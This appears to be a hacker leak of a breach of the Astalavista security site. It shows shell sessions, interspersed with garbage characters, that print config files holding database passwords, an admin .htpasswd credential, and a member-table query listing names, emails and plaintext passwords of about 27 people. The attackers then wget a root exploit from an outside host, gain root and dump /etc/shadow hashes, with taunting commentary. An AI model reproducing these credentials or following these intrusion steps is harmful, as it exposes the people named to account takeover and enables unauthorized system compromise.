drwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 链接标记astanet@astalavista.com- f0 y% T/ ], B
drwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend
0 V+ [1 K" d& [drwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner7 j; F3 R7 w( C v
-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg
# [6 Z' o" f/ odrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config
: U, ^2 Z- p# N; }. O6 h1 [drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron
3 D0 Q6 w2 {; H) O* {) Xdrwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd' c% e% H1 g& Y+ N8 D
-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php
2 B5 |, _' m" C0 v6 C-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico
- f6 e" p3 q6 c$ `0 e0 V7 L) b! [drwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed
. R& R: s, ]- {" wdrwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour
. O, ^% Z! M2 K( f: k3 F; k* B! C-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess
" O' Z' `* Q; b0 J5 y- I7 a& Y-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess
) T# h6 ?2 \0 f2 d. R-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php
: a/ [: z v1 e8 n5 E-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html
8 ]2 h2 Q6 f7 K7 X; ]-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php
/ q3 A" {. ^; P) A3 i-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php1 _. e$ v- J3 g& [
-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf
/ d8 |+ J' Y4 h# H" y& cdrwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc/ j( i" s ~' a; d8 b1 {. v
drwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang
( S0 x# k4 T, {8 U9 y/ r- ~drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib
* S7 p" T* ]7 D% y. F4 tdrwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log/ v% B) _3 T8 Y9 Q; g" e0 C
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member1 l" N7 R& n/ E
drwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata1 C: [# {2 @' y9 v4 w4 H: }5 s+ o
drwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new4 v a8 L, L' x6 y/ i& D( |2 _
-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf
6 d# i- u+ V3 B4 q9 v( wdrwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re
% d8 k, O; @. Q0 p" ~-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt
1 ]0 E7 K4 F. Mdrwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss' Q; x0 S+ j# b: }- E# y2 y
drwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources( o2 v" A* |1 Y& Y! | D1 c
drwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com. o3 `2 t; k2 i8 Z I
drwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes
' ^& u4 c f+ v& Hdrwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src
5 i9 `8 c6 ^ I7 I! J0 Odrwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl& _% a9 Z7 ?$ m4 e+ q. K
drwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v2
8 ^9 V- b, e/ `* y: d( ?1 Wdrwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old
1 Z, H2 v- k B& A-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php8 m) Z8 F9 p+ I& R$ J
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki
, b+ W+ ~4 C2 V3 S5 T) J( h5 H
$ E- R4 n) ^9 l! X* Y2 p' ~sh-3.2$ head -20 index.php5 k# S6 Y( U/ D" j6 P
<?PHP
1 Y! E, t ]4 P' c/**8 s& ]; X, v$ C: g8 F" v/ d) z
* Mainfile (external) for astalavistaNET v2.0# a2 u f/ v* n1 p/ f0 M
*
9 m' T$ V0 C. L9 L( g* @copyright Astalavista IT Engineering GmbH' x0 f+ h) i9 p; L' g
* @author Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>; O# G3 L4 B# b, p& D' p
* @version 1.01 a; N1 I/ s: }. {. {. I, }
*/
1 L: H* h9 I, R' N( L8 D, A( k
5 B& x |8 G- ]: x if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {2 S* v; P {) x& M2 \7 ~
$dontStartSession = false;
/ W+ a+ n; }, Q } else {8 `+ d( d7 p( N
$dontStartSession = true;
$ _6 e! j* }4 O }' Y" T: d: T( `2 E1 D! x3 E2 y6 S
require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);
+ _! `" x& f) T. E) x, ?: y& T require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);
6 Q7 X- t1 m8 F; C) | require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);, y3 ^1 x5 @8 \) G5 W( L4 D
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);
M9 S( e+ K% E* S. c3 Y$ \# x. K/ n1 r! T% {* S, z d2 q
sh-3.2$ cd config
: }7 Y$ @+ ^( E2 ^2 Ish-3.2$ ls -la( @- ]$ v. j3 ], V) q
total 32
9 F& B* u" u; S+ N' n* odrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .
: I4 u7 M8 |5 P& zdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..& p* V% j6 x1 W# F
-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php
$ a- z9 A# b, P-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php/ L; b: M+ U$ v2 k" B0 u
-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php: h" }" x7 X1 D
-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php
0 T. R1 Q. l0 h-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php0 b% L3 o, Z+ w3 h
/ a9 ]1 p4 m* B" v: ?+ f4 m$ fsh-3.2$ cat com.conf.php6 [8 d2 I% D- O' D, I. z, t
[snip]- S" R0 z& P( F+ e! r; a
//member-database3 w* K7 D1 j* s0 F: [
$_CONFIG['db_mem_server'] = ‘localhost’;& f- s$ \! p$ j4 P z) e
$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;
0 A5 {3 G4 |1 N$_CONFIG['db_mem_user'] = ‘astanet_db’;
5 F! }7 t3 H( }# k& c( ^9 J$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;* i# T0 L( F$ k2 ^, ^
$_CONFIG['db_mem_debug'] = false; //true or false8 D" a( l9 m9 [! f6 D
//ads-database
' ?7 D w& F5 [$ U3 Q/ K$_CONFIG['db_ads_server'] = ‘localhost’;
" u* M- o, X+ L) J0 ~: d- `" Y. @$_CONFIG['db_ads_database'] = ‘astanet_ads’;
; L# @. T. } _: Z% O$_CONFIG['db_ads_user'] = ‘astanet_db’;
' z/ H* D4 i4 U1 @! X$ ^5 P# }% B$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;+ J( p# d+ j: u; e
$_CONFIG['db_ads_debug'] = false; //true or false% v+ C* k7 S5 i* c, J! \8 r5 G! J
//rainbow-database8 C r+ w3 }6 r
$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′;$ J6 g6 R8 [9 K/ L c# ?
$_CONFIG['db_rainbow_database'] = ‘rainbow’;
' q0 r7 a1 S+ Z6 F2 Q$_CONFIG['db_rainbow_user'] = ‘dinu’;% F S4 f @7 T5 M; H. V
$_CONFIG['db_rainbow_password'] = ‘dinudinu’;
/ b$ h. |- J3 f! L$_CONFIG['db_rainbow_debug'] = false; //true or false
- x2 R* ]0 b3 r" ?) T, Y* \//mailing lists database
# K8 X, e* f6 r. e8 j: I: f8 }$_CONFIG['db_mailing_lists_server'] = ‘localhost’;' K( [0 p7 C! m9 v3 u
$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’;
: i; a& J% T$ l0 }" Q" ?5 b$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’;
6 A- X% v& f+ P0 s, j$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’;
$ B7 Z7 B; p" [6 l8 |6 S3 K5 _% i; g$_CONFIG['db_mailing_lists_debug'] = false; //true or false
8 l6 J/ ^) O; P H0 n//paypal3 a; k- U9 x2 i( ~% k" h
$_CONFIG['sub_pp_url'] = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;" U% I% t! _2 h' X2 y* c
$_CONFIG['sub_pp_cmd'] = ‘_xclick’;
2 Z+ J2 A0 G5 e6 e7 e! G( ?/ S( e$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;
s I' Z7 T# S1 z# |$_CONFIG['sub_pp_noship'] = ‘1′;
+ n1 ^* l5 W; u9 U: }4 J9 ^) {: P$_CONFIG['sub_pp_referer'] = ‘链接标记[url]https://www.paypal.com/[/url]’;
1 |* x6 Q1 w) d$ T; p3 c, s[snip]: R- Q' E. y& y
5 v9 h; n' B ^
sh-3.2$ cd ..0 g) j o( |* ^& w. L* @5 Q0 M* C
sh-3.2$ cd member
9 q P) x+ Y) ~0 k0 Ssh-3.2$ ls -la
. k- R0 h* r- h: C/ ytotal 201 l8 K/ J) x! Y4 ~
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .- }6 P. Y" \6 n+ u
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..4 f4 H& B9 Y) V; G8 Z Z8 L3 i
-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess2 ^5 C; U K% _- ^
-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php
5 x% z9 Y* }1 @$ T# ysh-3.2$ cat .htaccess* t% V, o+ I4 c- r' Q+ _% J
SecFilterEngine off2 R0 ]4 |0 [* }; j, F8 t. [5 C
- ?5 S6 k' T- w2 r1 R3 ~8 }sh-3.2$ cd ..% U* O( U4 d5 R8 U0 l
sh-3.2$ cd cron- I+ P* i8 s" I" H7 H
sh-3.2$ ls -la; W* e8 c/ v0 Z0 P
total 168
) ^1 z+ f- f5 b7 n0 S/ w9 bdrwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .* s+ Y# v/ ~/ P. ~3 K6 g; B D
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
; Q: y, C1 m# V9 y-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php0 `0 O B& g' ?& q
-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php
" y! ^/ u7 O B. A- u( G-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php2 h c: c& r" x8 k- p1 F/ _& |
-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php
7 p4 ?+ l0 a4 |% H( L% V, G-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php. v2 Q. V5 ~( c
-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php+ y( |( q4 P/ ^ {
-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php; u6 ^3 A/ a) d; w" B* ~
-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php7 a* ^5 P+ B# z- s% A4 x/ R
-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh
' Z, [* K" v. U; X+ ]% |-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php
1 |! {# W& |" E2 M-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php
' Y6 o1 s# f) V6 u: b( N( h-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php
( E7 @! t4 F: h* A9 r* k+ h& V-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh1 S" T# S% Y, @- k$ u( T
-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php
1 i* m/ j: a5 K/ B* ~# ~-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php
9 E, y" N$ B* B-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php
# S- J0 o( g* Y# L- l$ a9 v( g) v2 Z; W u-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php* ]; Z$ r4 i, l& S4 m3 _
-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php P* X! F: _- i/ h' f
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email
8 N- }1 q5 H7 g6 c! v' x0 | z-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php m$ w O' K9 E( f2 j
-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php) U; `* \6 Z. H% ~! H
" R& ` Q( i8 [- q. W( D2 a2 h
sh-3.2$ cd .., e, q% F9 E8 _. T
sh-3.2$ cd _007; P6 {3 @0 X& o
sh-3.2$ ls -la( y1 b" A, b6 g' | \
total 24
" @5 {/ t& @$ }2 V3 ldrwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .* q( S% e r9 r$ `8 T& }3 f
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..% f$ Z2 }& F! [& ^
-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess
# f0 g8 b% P1 [7 \, o( Y-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php
7 y. \2 W: |" f-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php) D% A$ y" P% i! y0 d+ C
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap1 K8 H+ V5 i! c2 H- {% Q+ L2 y7 Z
: e6 g) @6 z; P2 w% P5 psh-3.2$ cat .htaccess
' k9 k- r z4 P: N) h& aauthType Basic
- U" @/ @ ^' ]% l( Z& U6 D" YauthName Admin& C6 g+ F, } R+ T+ w! V+ ~
authUserFile /home/astanet/auth/.htadm_pwd
9 j& ?1 m; b: P" ]% zrequire valid-user
( ?# [- _7 J4 T6 c9 u9 G" i+ N9 i1 _( w5 y2 R
sh-3.2$ cat /home/astanet/auth/.htadm_pwd4 ~; _0 p9 V5 Y' d, Z* B; ^3 a$ h( R
admin2net:CR0bl65MwhfT
1 ^- j6 I' `% V# O8 W/ j. e
( c! C* ?, `8 W; q* E+ U- hsh-3.2$ mysql -u astanet_db -p3 q# y* m2 R2 P; r h/ G7 G
Enter password:
/ w- m$ h4 S& `! |5 G. y0 K4 h/ RWelcome to the MySQL monitor. Commands end with ; or \g.; G+ R8 @* ^1 l: Y7 y( h
Your MySQL connection id is 275153
; y' W1 @4 Q9 n; q: s) P' dServer version: 5.0.45-community-log MySQL Community Edition (GPL)3 U- a# X r! {1 b* F
3 T( k5 Y1 F- y$ e! cType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.7 G+ V$ }1 d0 m8 h# E
& t7 l; A1 W6 ~3 J6 J2 smysql> show databases;5 A8 ?# s4 ~- |, A' N8 U$ Y- K
+———————–+
& i9 ~) o2 ]7 p7 J3 Q| Database |
/ l1 \" T$ i r! h! c+———————–+
! i3 ~, w. _) q, r/ a7 O| information_schema |
) ^. R, D/ p9 v, q: y| astanet_ads |+ f3 T! R, W! i R p+ A; ~
| astanet_mailing_lists |
0 z1 |' ]3 V7 e+ q* p; d; e: P| astanet_mediawiki |3 ]( x( G6 ~8 k( }+ ~2 p+ W
| astanet_membersystem |
& d+ D9 b ?- S& O. O8 r# d4 s| test |7 R" s9 t, i5 i) V& c
+———————–+
" K9 q! O8 v2 b3 } @1 U( s9 ?6 rows in set (0.00 sec)
3 q: R! I/ Y& V) B$ G& B$ u/ g2 p! m9 a3 P
mysql> use astanet_membersystem
% m4 u( z% }+ g7 sDatabase changed
# C3 x: h8 ~* Q& n! f% mmysql> show tables;
# Z; E4 ?+ U1 t2 @9 Z: O+———————————–+
7 c' B2 {* m& ]; @/ c| Tables_in_astanet_membersystem |
% y0 ]9 m& L* \& E8 j+———————————–+% K7 `% G8 Y- w% ^2 d
| blacklist_categories |
8 j, o9 O5 C1 f E9 l, `| blacklist_content |
9 O% ~; ? s4 m8 F| blacklist_levels |
% g V2 m# [4 s$ ]0 u! u. v| blacklist_mcset |5 N: P# J. w" h5 a; @
| dir_categories |
9 Q: m6 |8 B2 N5 ~% H% C# _4 x| dir_comments |( x# M( P- V! N8 q: _' x- Z4 D
| dir_links |
8 X0 K- B [- D3 ~- x" M| dir_temp |) ]# p# v/ ^) Z4 J& U
| dir_votes |( I! p5 c7 a0 H# p5 n4 Y W' y
| documents |# y1 k. n% h5 J0 K: a
| documents_categories |
$ @- D0 J2 `- f7 n| email_content |
1 ?+ x" W* e: {" K) N| email_settings |
4 c. ~ C* h$ ?! m4 u. m" w0 u| exploits |( D) J! n. B- r S
| exploits_categories |
: a( Y L4 S. L+ `' x| exploittree_categories |8 y. i" Z2 t7 z/ d
| exploittree_exploits |) Z, \3 I: P* t, A1 r
| home_values |
3 N$ _3 D% W5 N s( W| iso_countries |% M/ O% \; `2 M; r0 Q: V
| links_categories |
! Y7 i. b% o) M$ c U| links_records |5 L2 s4 b5 P2 g- q9 ? G
| links_unauth |
# D2 Z* G( X& ]| links_votes |1 Z2 v$ }8 [( P( p4 A8 T
| log |# j' k9 f" d6 W
| news_categories |1 d! M1 |! E+ k3 l q0 _
| news_comments |
8 Z0 Z, [$ ^6 E$ W| news_emoticons |
# Q" x& f; q0 X- v5 O: j| news_latest |/ T7 T2 k3 @) i) G. h
| news_messages |+ A: g0 N* ?0 {( W
| news_statistics |3 ~! ?7 f* X' v9 R9 a. o R3 ^
| news_votes |
" Y5 N/ v5 z$ |2 Y| prices_content |; s% v0 c+ P1 p$ a# A0 C$ _
| prices_offers |" t$ E) s, [/ V+ ]% h* z
| rss_settings |
7 {! l7 k, E2 {! Z$ V. L; E| sessions |
$ X) ]$ c, D4 B| stats_signups |
; d2 R: a3 |% E! k| u2u2 |; m8 Y& ~. D& ^
| u2u_contact |
# |% a8 F: ~. k6 n& {% p| u2u_settings |
- J4 d2 s5 [4 l- K! H| user_keywords_selected_categories |
" ]+ a( }4 V: @- ]! t$ M| users |, c$ b+ n+ x4 S" m, b& p, t
| users_ipn_test |: y" j/ v' M* e2 U& S- N) y F
| users_keyword_values |$ v& Y! Z; U; p/ x
| users_profile |# w# B* S) X/ R1 T7 N5 q* u
| users_temp |) Y* q7 C* y+ z. Z& V
| users_upgrade |
/ e4 Y* e7 _- [& H- X+———————————–+
( ^- ~, @9 D* [0 T46 rows in set (0.00 sec)) R- N2 y$ x* c2 X0 }
" ~$ t% V3 o$ }8 h2 |9 A9 N5 h
mysql> describe users;
5 g+ x9 X) t7 X3 }, U. g+————————–+————————————–+——+—–+———————+—————-+% ]7 Z, P0 I8 q/ n+ s/ ^& @
| Field | Type | Null | Key | Default | Extra |! V" I& \% d& _& ?
+————————–+————————————–+——+—–+———————+—————-+
* ?/ D' ]) {% d' S" d/ F| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |
+ {( t9 g8 u1 {) z| user | varchar(50) | NO | | | |) y1 M# o: @& A4 Y# n) {
| nickname | varchar(30) | NO | MUL | anonymous | |1 p; `# d/ v0 | ^
| password | varchar(30) | NO | | | |% p& q8 T* r+ s- T0 X/ {
| userlevel | tinyint(3) | YES | MUL | NULL | |* y" @: l; N# W w
| exp | int(8) unsigned | NO | | 0 | |
4 I G; U0 T$ o" Q+ J| email | varchar(50) | NO | | | |% P& R- L7 n, Z# J
| ip | varchar(15) | NO | | 0 | |( v1 f2 p2 X' z+ \( x: U7 F9 q, j
| proxy | set(’0′,’1′) | NO | | 0 | |5 h2 @& G$ X% |* Y5 @% [9 U
| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |
: ^; w4 F. U- s8 x+ m| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |/ {6 |( E3 v& o" E
| anz_in | tinyint(1) | NO | | -1 | |8 m4 z3 [9 c4 S1 P+ E
| status | tinyint(1) unsigned | NO | | 0 | |
) o9 b/ s: g* P6 q$ I| checked | set(’0′,’1′,’2′) | NO | | 0 | |
) J/ F( I( ]' f* U| freemember | set(’0′,’1′) | NO | | 0 | |/ ?' T4 E; O) F; x3 Z! v
| ordertype | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES | | NULL | |
2 u$ N. t/ W/ o7 p# w L4 f$ r# ~, ]| lang | tinytext | NO | | | |5 J$ ]$ d) F0 Y+ m0 }, z
| adid | smallint(6) | NO | | 0 | |# B8 I1 a/ j: Q% Q: _" m5 ]- t
| pp_txn_id | varchar(255) | YES | | NULL | |# D6 @" P: j: S9 C& s
| cnb_transaction_id | varchar(255) | YES | | NULL | |5 _# B8 f7 R5 E' n: C$ R: U
| cnb_order_id | varchar(255) | YES | | NULL | |) o# U3 m$ F4 ?: b: V: ]3 d' `
| cnb_user_id | int(11) | YES | | 0 | |
$ i) A$ f3 F: c" m6 I+————————–+————————————–+——+—–+———————+—————-+9 f* U6 y" u% |! L7 b$ ]
22 rows in set (0.01 sec); r' _; u Y) i6 V/ G+ x
" ~0 E W* Z7 Y% a: Z
mysql> select count(*) as skids from users;
+ y1 D; W/ S( P" `+ {7 |! H3 k+——-+
2 \& y. C. { I8 ]) r| skids |
# u: O8 P" A% A+——-+
) a! Y4 T3 M" ^7 N| 25199 |5 S/ N+ z7 I$ g' B: M ^; J
+——-+3 E9 P( r8 {& p4 E0 Y* s1 [5 f/ Y
1 row in set (0.00 sec)
2 O. g2 S3 S) o
6 U( ~: E7 h) @+ b. jmysql> select user,nickname,password,email from users where userlevel = 1;
. ]$ ?$ I# W# ]: H5 X; Z+————————–+———————-+——————+———————————–+/ q. _& b/ {& |
| user | nickname | password | email |' A, T2 D5 y3 K: ?
+————————–+———————-+——————+———————————–+1 y# C6 @. K0 F; ~8 M
| pascal | prozac | astaman3 | 链接标记info@astalavista.net |' u( R9 y1 b6 n2 b
| Ivan Schmid | rOOtless1 | astalavista4asta | 链接标记ivan.schmid@comvation.com |% @0 D4 U, U) m5 ^ ~& y& v+ t
| qreymer | Palermo | qblsw85iam | 链接标记eche@home.se |
$ s. D$ s8 [7 }# b| Christian Wehrli | g0atherd | hitt?74 | 链接标记g0atherd@gmx.net |# {* i- Z/ K6 a
| Andrew Blake | Minky | liq73uid | 链接标记a.blake@har.mrc.ac.uk |
4 _5 m- j( I: [3 O7 K) Q3 @* w0 r| Martin Wyss | dinu | kj63;cXy | 链接标记martin.wyss@astalavista.net |
8 j" I9 {( b Y! L, b| Leandro Nery | Timan_no_Sanco | nery2002 | 链接标记leandronery@hotmail.com |) `% U: C6 A" d0 }# s" g
| shaving ryans privates | ShavingRyansPrivates | memberboard313 | 链接标记shavingryansprivates1@hotmail.com |
. t, }$ t% R5 Q7 f ~, c4 d| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | 链接标记spoofedexistence@hotmail.com |
% ~, \7 h* Y% B9 t. || David M Lee | Daremo | icG12m03 | 链接标记daremo@hackerheaven.com |. V# v; F8 a' g" P4 r+ r C; b' Z
| David Corn | akriel | ve3uB$cUku | 链接标记akriel@fallenroot.net |" e2 Q7 [/ @8 S* k! M0 a! d
| Thomas Kalin | Gwanun | QwErTy123 | 链接标记thomas.kaelin@astalavista.net |+ E+ d# K6 S& D
| Marcus unknown | Cra58cker | hhCr4ck06 | 链接标记unknownmarcus@hotmail.com |5 v" L( C2 `4 z. [
| David Ellis | dellis203 | philip | 链接标记dellis@nightwatchnss.com |; u* b5 X2 ^0 E. N0 L6 B
| Lars Christian Solberg | xeor | tF3s4|Nea | 链接标记xeor@hush.com |
7 y# `% c- \0 H+ D8 S' T; A7 Y# ]| Paulo Santos | Be1er0ph0r1 | amor01 | 链接标记pmsantos@gmx.ch |3 X( C. `6 p4 f/ T0 @
| Thomas D?ppen | daha | asta4tom | 链接标记thomas.daeppen@astalavista.ch |
/ x6 p+ k, s8 b% x& u2 }( H& S2 @| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | 链接标记toraj.a.m@gmail.com |! _4 n u5 e2 a3 W( W1 j7 J
| Fabius Bernet | traviser | wellenreiter100 | 链接标记fabius.bernet@astalavista.ch |
6 E5 J# i' U$ d3 J& k| Zachary McElroy | duder1 | dirty245dix | 链接标记mcelroyzj@yahoo.com |$ c8 z+ g% @* P n0 A9 a
| Leron Cohen | cohen2 | leron4free | 链接标记leron@quiredmedia.com |1 s1 x. X. W/ M5 X2 `, z
| Beatriz Pontes | anonymous1656 | pitas | 链接标记joao.pedro.pontes@gmail.com |
3 ^4 p, z) L4 c, l. k| Glafkos Charalambous | anonymous2086 | si99490178$# | 链接标记nowayout@webhostline.com |5 i# s3 ]# _9 u# ^$ t+ [: R2 r
| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | 链接标记ivan.schmid@astalavista.ch |$ d# v/ D: P- }! B! V- l
| Peter Fisher | cyph3r1 | testZer025435 | 链接标记cyph3r@astalavista.com |
4 Y* n& E( | Z/ S2 f| sykadul | sykadul | ak29eral | 链接标记sykadul@gmail.com |
+ {" M: u) R0 F8 E| Ronny Janzi | commander1 | mpbdaagf6m | 链接标记ronny.janzi@astalavista.ch |
P1 G6 |" e" w$ g+————————–+———————-+——————+———————————–+0 D6 x- i- d* g$ o" l
27 rows in set (0.00 sec)
* g1 E% `; O7 r( R! P5 w
+ s2 Q- ^' I5 w' Q7 umysql> exit;- x7 `/ e% {5 ?8 w. I
Bye
. b K# p. s& l/ e) U
) [5 D2 q# A7 e0 `[~] plaintext passwords? yes,. l% g/ @& |1 s( `% d( [' A1 `
Those so called “security professionals” who charge you $6.66 / month to4 S7 Q A4 c9 q# |$ B
register at their hack-proof portal, save your passwords in plaintext…
; h# P; }* m' `$ u3 \' s) [brilliant!
/ F! h' g# W, j% [! s' n: h+ i
; L2 _: L0 [% l! S[~] This been fun but we want more.
( J6 c- O* F' I' ]' D4 P
, W8 w5 C5 C, Y" ~sh-3.2$ uname -a
" m2 o6 z( h/ ELinux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
* u1 F+ G7 }3 H* t8 r3 `3 W; l0 _sh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]4 F& m) F4 q. i1 V5 b; q
–13:33:37– 链接标记[url]http://anti.sec.labs/g0troot[/url]+ p/ z/ ^* {( L! G/ P8 }0 Z
Resolving anti.sec.labs… 13.33.33.37
+ \9 `) G0 T' h: B! Q, J2 hConnecting to anti.sec.labs|13.33.33.37|:80… connected.% I9 C0 [$ f4 w P
HTTP request sent, awaiting response… 200 OK0 ?+ I/ _4 g/ u
Length: 18200 (18K) [text/plain]
0 ?' F% o; ]! c' Q% ]0 {Saving to: `g0troot’
0 J7 n' ^: Q( |8 u2 K- X6 ~2 @7 a3 a, F
100%[=========================================================================================================================================>] 18,200 58.6K/s in
2 L) M- f" U8 _+ C0.3s4 g; V5 [ _* Y5 U
. l) j: k: B" n5 [7 f0 y0 r
18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]+ g& j+ p- X4 j
* a2 M* K9 }3 r7 N! Y `, bsh-3.2$ ./g0troot -i x86_64+ E7 c! X; v4 e' b A" o( D
[+] g0troot - anti.sec.labs/ @2 h j2 w F
[+] Target: 2.6.18-128.1.10.el5
/ v! x( Z7 |1 }: U3 Z2 G* ?[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
4 a6 |; g+ H* x% e3 [9 v0 T' o
[+] r00tr00t8 f9 P0 [& w4 n' A, R, k# }5 T
[~] Executing shell…* `* x1 C$ s; t! a- f. r
9 E' [% @- ]4 lsh-3.2# id
3 J* I! V0 M' X0 u# Iuid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
( J, \8 e6 P& W3 q! w
, ]2 c7 Z1 ?7 M4 tsh-3.2# cat /etc/shadow+ B# K& v" g( F" _8 v" {
root 1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::
+ J H) ?. _1 f- @ `[snip]
0 t- |* E% l; H. b' K, L+ K2 r) badmin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::, Q$ `& ~( D5 X
jon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7::: X# u- I& G8 q2 U, r0 F
com1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::: K1 I# r, m/ i2 o
astanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::5 K' Q7 X- j5 C! l
% U' j! \$ P- j
sh-3.2# cat /etc/motd+ w- Z+ l6 v; o- ]: ?$ t
#####################################################" |" N8 A8 i8 w8 Z. N
#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #
% u6 `! n0 q2 k! s# |__| [__ | |__| | |__| | | | [__ | |__| #7 b& r, M& ?. v" b+ S3 c/ ]/ l
